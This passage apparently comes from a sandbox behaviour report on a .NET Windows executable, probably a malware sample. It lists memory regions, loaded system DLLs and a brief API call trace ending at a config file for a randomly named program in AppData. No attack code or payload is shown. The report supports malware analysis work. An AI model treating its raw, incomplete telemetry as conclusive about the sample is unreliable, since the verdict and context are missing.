"c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 823 start_va = 0x75210000 end_va = 0x75223fff monitored = 0 entry_point = 0x7521ac00 region_type = mapped_file name = "vcruntime140_clr0400.dll" filename = "\\Windows\\SysWOW64\\vcruntime140_clr0400.dll" (normalized: "c:\\windows\\syswow64\\vcruntime140_clr0400.dll") Region: id = 832 start_va = 0x66220000 end_va = 0x662cafff monitored = 0 entry_point = 0x662b5f20 region_type = mapped_file name = "ucrtbase_clr0400.dll" filename = "\\Windows\\SysWOW64\\ucrtbase_clr0400.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase_clr0400.dll") Region: id = 864 start_va = 0xb0000 end_va = 0xb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 865 start_va = 0xe0000 end_va = 0xeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 866 start_va = 0xc0000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 867 start_va = 0xd0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 868 start_va = 0x260000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 869 start_va = 0x270000 end_va = 0x27ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 870 start_va = 0x280000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 871 start_va = 0x290000 end_va = 0x29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 872 start_va = 0x320000 end_va = 0x320fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 873 start_va = 0x330000 end_va = 0x330fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 874 start_va = 0x4d0000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 875 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 876 start_va = 0x960000 end_va = 0xa6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 877 start_va = 0x370000 end_va = 0x3affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 878 start_va = 0xb60000 end_va = 0xc5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 879 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 880 start_va = 0x340000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 881 start_va = 0x26f0000 end_va = 0x46effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 882 start_va = 0x960000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 883 start_va = 0xa30000 end_va = 0xa6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 884 start_va = 0x520000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 885 start_va = 0x560000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 886 start_va = 0xcd0000 end_va = 0xdcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 887 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 888 start_va = 0xe60000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 889 start_va = 0xef0000 end_va = 0xfeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 890 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 891 start_va = 0x46f0000 end_va = 0x49befff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 957 start_va = 0x64e10000 end_va = 0x6621afff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll") Region: id = 958 start_va = 0x763d0000 end_va = 0x7652bfff monitored = 0 entry_point = 0x7641ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 959 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 960 start_va = 0xff0000 end_va = 0x11effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 961 start_va = 0xa70000 end_va = 0xb4efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 962 start_va = 0x340000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 967 start_va = 0x751e0000 end_va = 0x751e2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-xstate-l2-1-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-xstate-l2-1-0.dll") Region: id = 968 start_va = 0x64d20000 end_va = 0x64da8fff monitored = 1 entry_point = 0x64d21130 region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll") Region: id = 969 start_va = 0x76ad0000 end_va = 0x76b5efff monitored = 0 entry_point = 0x76ad3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 970 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 971 start_va = 0x642c0000 end_va = 0x64d14fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll") Region: id = 972 start_va = 0x64110000 end_va = 0x642b2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.drawing.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\system.drawing.ni.dll") Region: id = 975 start_va = 0x632a0000 end_va = 0x64105fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.windows.forms.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\system.windows.forms.ni.dll") Region: id = 977 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 978 start_va = 0x62c40000 end_va = 0x631e3fff monitored = 1 entry_point = 0x631cb692 region_type = mapped_file name = "system.windows.forms.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.windows.forms\\v4.0_4.0.0.0__b77a5c561934e089\\system.windows.forms.dll") Region: id = 979 start_va = 0x3b0000 end_va = 0x3b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 980 start_va = 0x629d0000 end_va = 0x631e7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\31fae3290fad30c31c98651462d22724\\system.core.ni.dll") Region: id = 981 start_va = 0x628c0000 end_va = 0x629c4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\96f7edb07b12303f0ec2595c7f3778c7\\system.configuration.ni.dll") Region: id = 982 start_va = 0x62140000 end_va = 0x628b3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\15af16d373cf0528cb74fc73d365fdbf\\system.xml.ni.dll") Region: id = 983 start_va = 0x62120000 end_va = 0x62132fff monitored = 1 entry_point = 0x6212d900 region_type = mapped_file name = "nlssorting.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\nlssorting.dll") Region: id = 984 start_va = 0x49c0000 end_va = 0x4c91fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nlp" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\sortdefault.nlp" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\sortdefault.nlp") Region: id = 985 start_va = 0x755b0000 end_va = 0x761f9fff monitored = 0 entry_point = 0x75631601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 986 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 987 start_va = 0x744c0000 end_va = 0x744cafff monitored = 0 entry_point = 0x744c1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 988 start_va = 0xff0000 end_va = 0x10cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 989 start_va = 0x11b0000 end_va = 0x11effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 990 start_va = 0x751f0000 end_va = 0x75206fff monitored = 0 entry_point = 0x751f35fa region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 991 start_va = 0x74190000 end_va = 0x741a6fff monitored = 0 entry_point = 0x74193573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 992 start_va = 0x4d0000 end_va = 0x50bfff monitored = 0 entry_point = 0x4d128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 993 start_va = 0x4d0000 end_va = 0x50bfff monitored = 0 entry_point = 0x4d128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 994 start_va = 0x4d0000 end_va = 0x50bfff monitored = 0 entry_point = 0x4d128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 995 start_va = 0x4d0000 end_va = 0x50bfff monitored = 0 entry_point = 0x4d128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 996 start_va = 0x4d0000 end_va = 0x50bfff monitored = 0 entry_point = 0x4d128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 998 start_va = 0x74150000 end_va = 0x7418afff monitored = 0 entry_point = 0x7415128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1007 start_va = 0xdd0000 end_va = 0xe51fff monitored = 0 entry_point = 0xdd19a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 1008 start_va = 0xdd0000 end_va = 0xe51fff monitored = 0 entry_point = 0xdd19a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 1009 start_va = 0x62090000 end_va = 0x62113fff monitored = 0 entry_point = 0x620919a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 1010 start_va = 0x4d0000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 1011 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 1012 start_va = 0x510000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 1013 start_va = 0x61ea0000 end_va = 0x62081fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.visualbasic.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.V9921e851#\\a891970b44db9e340c3ef3efa95b793c\\Microsoft.VisualBasic.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.v9921e851#\\a891970b44db9e340c3ef3efa95b793c\\microsoft.visualbasic.ni.dll") Region: id = 1015 start_va = 0x4d0000 end_va = 0x4ddfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 1394 start_va = 0x1040000 end_va = 0x107ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 1395 start_va = 0x1090000 end_va = 0x10cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 1396 start_va = 0x1110000 end_va = 0x114ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001110000" filename = "" Region: id = 1397 start_va = 0x4dd0000 end_va = 0x4ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004dd0000" filename = "" Region: id = 1398 start_va = 0x4fe0000 end_va = 0x50dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004fe0000" filename = "" Region: id = 1399 start_va = 0x7efa7000 end_va = 0x7efa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 1400 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 1401 start_va = 0xc60000 end_va = 0xcc1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorrc.dll") Region: id = 1403 start_va = 0x707f0000 end_va = 0x7097ffff monitored = 0 entry_point = 0x7088d026 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 1404 start_va = 0x50e0000 end_va = 0x52dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050e0000" filename = "" Region: id = 1405 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 1406 start_va = 0x4d20000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d20000" filename = "" Region: id = 1407 start_va = 0x5150000 end_va = 0x524ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 1408 start_va = 0x52d0000 end_va = 0x52dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000052d0000" filename = "" Region: id = 1409 start_va = 0x7efa4000 end_va = 0x7efa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 1410 start_va = 0xdd0000 end_va = 0xe4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 1411 start_va = 0x679b0000 end_va = 0x67aaafff monitored = 0 entry_point = 0x679c17e1 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 1412 start_va = 0x4ca0000 end_va = 0x4d00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ca0000" filename = "" Region: id = 1413 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1414 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1415 start_va = 0x4d60000 end_va = 0x4dc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d60000" filename = "" Region: id = 1416 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1417 start_va = 0x4ed0000 end_va = 0x4fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ed0000" filename = "" Region: id = 1418 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 1419 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 1420 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 1421 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 1422 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1423 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 1424 start_va = 0x5e0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 1425 start_va = 0x5f0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 1426 start_va = 0xa00000 end_va = 0xa0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 1427 start_va = 0xa10000 end_va = 0xa1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 1428 start_va = 0xa20000 end_va = 0xa2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 1429 start_va = 0xb50000 end_va = 0xb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 1430 start_va = 0xe50000 end_va = 0xe5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 1431 start_va = 0xea0000 end_va = 0xeaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ea0000" filename = "" Region: id = 1432 start_va = 0xeb0000 end_va = 0xebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 1433 start_va = 0xec0000 end_va = 0xecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ec0000" filename = "" Region: id = 1434 start_va = 0xed0000 end_va = 0xedffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ed0000" filename = "" Region: id = 1435 start_va = 0xee0000 end_va = 0xeeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 1436 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 1437 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 1438 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1439 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 1440 start_va = 0x5e0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 1441 start_va = 0x5f0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 1442 start_va = 0xa00000 end_va = 0xa0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 1443 start_va = 0xa10000 end_va = 0xa1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 1444 start_va = 0xa20000 end_va = 0xa2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 1445 start_va = 0xb50000 end_va = 0xb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 1446 start_va = 0xe50000 end_va = 0xe5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 1447 start_va = 0xea0000 end_va = 0xeaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ea0000" filename = "" Region: id = 1448 start_va = 0xeb0000 end_va = 0xebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 1449 start_va = 0xec0000 end_va = 0xecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ec0000" filename = "" Region: id = 1450 start_va = 0xed0000 end_va = 0xedffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ed0000" filename = "" Region: id = 1451 start_va = 0xee0000 end_va = 0xeeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 1452 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 1453 start_va = 0xff0000 end_va = 0x1020fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ff0000" filename = "" Region: id = 1454 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 1455 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 1456 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 1457 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 1458 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 1459 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1496 start_va = 0x1200000 end_va = 0x123ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 1497 start_va = 0x53d0000 end_va = 0x54cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000053d0000" filename = "" Region: id = 1498 start_va = 0x7efa1000 end_va = 0x7efa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 1499 start_va = 0x742c0000 end_va = 0x742cdfff monitored = 0 entry_point = 0x742c1235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 1500 start_va = 0x1150000 end_va = 0x118ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 1501 start_va = 0x5540000 end_va = 0x563ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005540000" filename = "" Region: id = 1502 start_va = 0x7ef9e000 end_va = 0x7efa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Thread: id = 23 os_tid = 0xe28 [0076.773] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0079.867] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x1eebb0 | out: phkResult=0x1eebb0*=0x0) returned 0x2 [0079.867] RegCloseKey (hKey=0x80000002) returned 0x0 [0079.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x1eee34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x77 [0079.897] IsAppThemed () returned 0x1 [0079.903] CoTaskMemAlloc (cb=0xf0) returned 0x4270d0 [0079.903] CreateActCtxA (pActCtx=0x1ef358) returned 0x4272c4 [0080.071] CoTaskMemFree (pv=0x4270d0) [0080.102] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc219 [0080.102] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc21a [0080.940] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe.config", nBufferLength=0x105, lpBuffer=0x1eecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe.config", lpFilePart=0x0) returned 